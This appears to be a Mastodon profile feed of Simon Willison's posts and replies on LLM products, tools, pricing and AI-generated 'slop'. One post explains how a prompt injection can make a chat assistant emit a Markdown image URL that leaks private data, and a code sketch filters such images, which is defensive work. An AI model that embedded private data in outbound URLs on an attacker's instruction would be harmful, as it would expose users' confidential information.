120 posts total
Simon Willison

New TIL: Using sqlite-vec with embeddings in sqlite-utils and Datasette til.simonwillison.net/sqlite/s

Simon Willison

OK gang! This is ready for you to test.

python tweet2html.py --css 1234

That will take a Twitter ID and return HTML and CSS for you to embed in your website with no calling back to Twitter.

Features:
🗣 Avatars inlined as Base64 WebP
📸 All attached photos inlined
🎥 Video poster inline, <video> to original source
🔗 Hyperlinks don't use t.co
#️⃣ Hashtags and @ mentions linked
🕰 Semantic time
♥ and 🗨 counts

Try it out at github.com/edent/Tweet2Embed

Feedback and pull requests very welcome!

Simon Willison

This 404 Media piece definitively answers the question about where all of the weird Jesus shrimp AI generated image slop on Facebook comes from, and it’s fascinating: 404media.co/where-facebooks-ai

A few of my own notes here: simonwillison.net/2024/Aug/10/

22

@simon I believe you invented the term “slop” right 😁 my question is, if “slop” is “unwanted AI-generated content” why is this called “slop” when it’s obviously getting a ton of engagement? Is the claim that all the likes are bots? If it’s actually hundreds of thousands of people liking AI-generated images then isn’t it … not unwanted?

Simon Willison

I spent some time reading the newly released GPT-4o System Card - it's a fascinating document, with all kinds of interesting new-to-me details in there. I've posted my highlights here: simonwillison.net/2024/Aug/8/g

I particularly enjoyed this bit about "scheming"

Lafncow :blobcatcoffee:

@simon "...it is unlikely that GPT-4o is capable of catastrophic scheming."

So either it's bad at it or really good at it.

Mans R

@simon Do they actually believe that stuff?

Simon Willison

Google announced a major price drop for their Gemini 1.5 Flash model today - it's now the cheapest of the mainstream cheap-and-fast models, and it can also handle PDF files, audio and video as well as images and text.

More notes here: simonwillison.net/2024/Aug/8/g

Clifford Adams

@simon
With all these price drops I'm waiting until they start paying me to use their models. 😜

Simon Willison

I got fed up of Claude's lack of a feature to export and share a full conversation, so I built a new tool for doing that using an Observable notebook - details here: simonwillison.net/2024/Aug/8/c

Here's an example shared transcript, in which I start by asking for advice on breeding spiders to catch flies and then keep on escalating until Claude is frantically advising me not to attract any bears to deal with the mountain lions that have surrounded my house: gist.github.com/simonw/95abdfa

Spencer

@simon This conversation is giving me strong "there was an old lady who swallowed a fly" vibes

Simon Willison

I've released a new reusable Django app - django-http-debug - which makes it easy to quickly set up a debugging HTTP endpoint that returns a canned response and logs full details of any incoming requests, great for the initial stages of implementing things like OAuth or incoming webhooks.

Most of the code was written for me by Claude 3.5 Sonnet - full details here: simonwillison.net/2024/Aug/8/d
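
To illustrate the idea of a debugging endpoint (a canned response plus a log of every incoming request), here is a minimal sketch as a plain WSGI app using only the standard library. It is not django-http-debug's code or API: the names `debug_app`, `REQUEST_LOG` and `CANNED_BODY` are hypothetical, and the in-memory list is an assumption made for brevity.

```python
# Hypothetical sketch of a "canned response + request log" endpoint.
# This is NOT django-http-debug's implementation; all names are illustrative.

REQUEST_LOG = []                 # assumption: keep captured requests in memory
CANNED_BODY = b'{"ok": true}'    # assumption: a fixed JSON reply


def debug_app(environ, start_response):
    """WSGI app that records the incoming request and returns a fixed body."""
    # Read exactly CONTENT_LENGTH bytes of the request body, if any.
    length = int(environ.get("CONTENT_LENGTH") or 0)
    body = environ["wsgi.input"].read(length) if length else b""

    # WSGI exposes request headers as HTTP_* keys; turn them back into names.
    headers = {
        key[5:].replace("_", "-").title(): value
        for key, value in environ.items()
        if key.startswith("HTTP_")
    }

    REQUEST_LOG.append(
        {
            "method": environ.get("REQUEST_METHOD"),
            "path": environ.get("PATH_INFO"),
            "query": environ.get("QUERY_STRING", ""),
            "headers": headers,
            "body": body.decode("utf-8", errors="replace"),
        }
    )

    start_response(
        "200 OK",
        [
            ("Content-Type", "application/json"),
            ("Content-Length", str(len(CANNED_BODY))),
        ],
    )
    return [CANNED_BODY]
```

To try it locally, something like `wsgiref.simple_server.make_server("127.0.0.1", 8000, debug_app).serve_forever()` should serve it, after which a webhook or OAuth callback can be pointed at that address and `REQUEST_LOG` inspected.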

Simon Willison

As part of working on this I figured out (with more help from Claude) a good pattern for writing automated tests for a reusable Django app like this that can live in the same repository and spin up a minimal Django project, just enough for the tests to run. I wrote that up in detail as this TIL: til.simonwillison.net/django/p

Glyph

@simon does this level of LLM “authorship” give you concerns about its provenance?

antrix

@simon do you use any IDE integrations to work with LLMs?

Simon Willison

Your regular reminder to never build an LLM-based chat interface with access to privileged information that can render Markdown images targeting external domains, if you don't want a prompt injection attack to be able to instantly exfiltrate that private data

Today's example is Google AI Studio: simonwillison.net/2024/Aug/7/g

It joins ChatGPT, Google Bard, writer.com, Amazon Q, Google NotebookLM and GitHub Copilot Chat in my collection of products that have made this mistake: simonwillison.net/tags/markdow
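
The attack works because injected instructions can make the model emit a Markdown image whose URL carries private data in its query string, and the browser requests that URL as soon as the image renders. One possible mitigation is to filter model output before rendering it. The sketch below is an assumption-laden illustration, not how any of the products above fixed the issue: `strip_external_images` and `ALLOWED_IMAGE_HOSTS` are hypothetical names, and it only handles inline `![alt](url)` images, not reference-style images or raw HTML `<img>` tags.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only hosts the chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Inline Markdown images: ![alt](url) or ![alt](url "title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_external_images(markdown: str) -> str:
    """Replace images whose host is not allow-listed with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image as written
        # Untrusted host, or no host at all (relative URL): drop the URL
        # entirely so nothing is fetched and no query string leaks.
        return f"[image removed: {alt}]"

    return IMAGE_PATTERN.sub(replace, markdown)
```

For example, `strip_external_images("![x](https://evil.example/log?q=SECRET)")` returns `"[image removed: x]"`, while an image hosted on `static.example.com` passes through unchanged. A Content Security Policy restricting image sources is another option and is more robust than regex filtering.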

Colby Russell

@simon I guess I don't understand how this is an attack. The malicious prompt came from the attacker, but so did everything else. So the attacker already has access to the "exfiltrated" data, right?

Or is there some missing context here?

Simon Willison

OK, turns out Tim Walz is a former geography teacher and a GIS and data visualization nerd
mastodon.social/@kjhealy/11291

Parsingphase

@simon So, Walz knows Where, and Harris knows Venn.

Andrew Harvey

@simon @kjhealy Do we know his opinions on the Mercator projection?

Steven Zekowski

@simon

minnesotareformer.com/2024/08/

> Walz also says maps help implement the nitty-gritty details of otherwise abstract policy. “You have to have a plan” for “how we’re doing power and economic justice and environmental justice,” he said. “The tools for that plan are GIS.” Those tools “transfer a vision of a fair society into one that actually has results.”
#HarrisWalz2024

Simon Willison

OpenAI announced "Structured Outputs in the API" today, which is a lot more exciting than it sounds and also came with a huge price drop (50% cheaper) for a new GPT-4o model - which makes it their new cheapest model for image inputs, since GPT-4o-mini is priced the same for image inputs as the previous, more expensive GPT-4o

My detailed notes here: simonwillison.net/2024/Aug/6/o

Jeff Triplett

@simon I did quite a bit of testing tonight and was surprised that structured outputs also worked with GPT-4o-mini. I didn’t crunch the numbers but I was already using it to parse text to JSON and I noticed an immediate improvement. I assumed we had to use the new model for Pydantic support but it just worked.

Simon Willison

Weeknotes: a staging environment, a Datasette alpha and a bunch of new LLMs simonwillison.net/2024/Aug/6/s

Simon Willison

Fascinating report from 404 Media's Samantha Cole on a trove of leaked NVIDIA Slack messages and emails about how they're scraping millions of YouTube videos to train their own new foundation video generation model: 404media.co/nvidia-ai-scraping

Posted a few of my own notes here: simonwillison.net/2024/Aug/5/n

It's not surprising to learn that they're doing this - that's practically the industry standard right now - but it's still really interesting to see internal details of what they're collecting and why

phillmv

@simon

every now and then i feel like im taking crazy pills because i remember when aaron swartz killed himself because he was going to go to jail forever because he scraped JSTOR,

and eleven years later your manager tells you “sshhhh it’s fine just scrape all of it don’t worry the CEO said it’s fine”

Lewis Cowles

@simon
Do you think Nvidia might become more chaos focused in future?

I genuinely worry about big AI companies becoming chaos agents.

Also do you think they are paying YouTube for that kind of access, or paying folks like youtube-downloader?

Simon Willison

It turns out Google Chrome ships a default, hidden extension that allows code on `*.google.com` access to private APIs, including your current CPU usage

You can test it out by pasting the following into your Chrome DevTools console on any Google page:

chrome.runtime.sendMessage(
  "nkeimhogjdpnpccoofpliimaahmaaome",
  { method: "cpu.getInfo" },
  (response) => {
    console.log(JSON.stringify(response, null, 2));
  },
);

More notes here: simonwillison.net/2024/Jul/9/h

mirabilos

@simon @Shamar did you really have to point out that you used a theft machine (“AI”) to write that short JS snippet?

Ah. From your profile, you’re a promoter of these theft machines. Byebye…

Tann

@simon friendly reminder that you need root access to fully remove Google from many android phones and tablets and that root access generally voids your warranty. That said, most warranties don't last longer than a couple years so if you've had your phone for 2 or more years then you likely have little to lose by ripping your *.google.com applications out and replacing them with much more secure applications.

If you don't want to do that, the paid version of #netguard can at least lock down your phone's network traffic app by app and web address by web address.

Simon Willison

Several of the major social media platforms - Instagram, TikTok, LinkedIn, Twitter - have effectively declared war on linking to things and I absolutely hate it

"Link in my bio" / "Link in thread" / "Link in first comment"... or increasingly no link at all, just an unsourced screenshot of a page

Kat the Leopardess

@simon That's why I can't listen to people make the opposite talking point about decentralized or alternative social media. People wanna stick to FB/Meta and the big platforms bc they need the exposure and consider things like the Fedisphere "too complicated"

....and yet you obviously are going to have to get more complicated in how you continue to get that exposure on places like Meta/Ig...by having to do workarounds for the link blocking.

Like, is that complacency really that much better and easier?

Adam Dalliance

@simon Email too. The more links in your email the more likely they are to put it in a spam folder.

tallship

@simon

A couple of things there Simon. How do you know this? Are you still using the deprecated, privacy mining, monolithic silos to which you refer, or are you just taking this on the word of good, 3rd party information sources?

If it's the former, why?

If it's the latter, then yippie kai yay! The demise of these platforms is underway and in full swing - just as Steve Ballmer once called Linux "Cancer", the fact that these silos aren't simply ignoring links to particular resources, especially those in the #Fediverse, and have taken up with the practice of actively blocking them, is a good thing; and you, as a #Fedizen, should be proud.

Yet again, if it is the former, and you really insist on validating and monetizing those privacy mining silos via your subjugation as inventoried chattel there, consider pinning something akin to the following to the top of your profile (make sure to read the alt-text for the image):

Simon Willison

Here's a brilliant neologism: "slop", for text generated entirely by LLMs and published, unwanted, on the Internet

> Watching in real time as "slop" becomes a term of art. the way that "spam" became the term for unwanted emails, "slop" is going in the dictionary as the term for unwanted AI generated content

Source: twitter.com/deepfates/status/1

Random Geek

@simon @troublewithwords like “spam,” “slop” has that p-sound so you can really spit the word out when you’re mad.

⛈️ Information ⛈️

@simon I wish Fates would make the jump to Mastodon.

Simon Willison

I built a new tool: tools.simonwillison.net/ocr - it runs OCR against images and PDFs entirely in your browser (no file upload needed) using Tesseract.js and PDF.js

I wrote more about the tool and how I built it (with copious amounts of Claude 3 Opus and a little bit of ChatGPT) here: simonwillison.net/2024/Mar/30/

gabi

@simon Insanely cool! It works fine in Android Chrome (no luck with Firefox though).

ResearchBuzz

@simon Damn, that's awesome! Queued for ResearchBuzz.

Simon Willison

I wrote about the AI trust crisis: when companies like Dropbox and OpenAI say "we won't train models on your private data", it's increasingly clear that a lot of people simply don't believe them.
simonwillison.net/2023/Dec/14/

Simon Willison

New release of shot-scraper, my CLI tool for taking screenshots of web pages (and scraping them with JavaScript) github.com/simonw/shot-scraper

Simon Willison

I wrote some notes about DALL-E 3, including reverse engineering some aspects of how it works. It's a fascinating insight into the prompt engineering that happens inside of OpenAI

**Now add a walrus: Prompt engineering in DALL-E 3**
simonwillison.net/2023/Oct/26/

Simon Willison

Published a short TIL about the very simple 2x2 CSS grid layout I used to display the images in that post til.simonwillison.net/css/simp
